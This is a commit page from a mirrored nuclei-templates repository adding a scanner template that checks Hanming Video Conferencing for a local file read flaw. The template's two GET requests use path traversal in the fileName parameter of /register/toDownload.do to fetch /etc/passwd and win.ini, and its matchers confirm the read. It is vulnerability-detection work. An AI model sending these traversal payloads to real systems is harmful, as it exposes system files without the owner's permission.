daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #4079 from ritikchaddha/patch-19 

Create  hanming-video-conferencing-file-read.yaml
patch-1
Prince Chaddha 2022-04-10 01:15:06 +05:30 committed by GitHub
parent 9ca33122f8 c48a3009ef
commit 7a26b26611
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
vulnerabilities/other/hanming-lfr.yaml Normal file
View File

@ -0,0 +1,29 @@
id: hanming-lfr
info:
name: Hanming Video Conferencing File Read
author: ritikchaddha
severity: high
reference: https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKA
tags: lfr,hanming,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini"
- "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
- type: regex
regex:
- "root:[x*]:0:0:"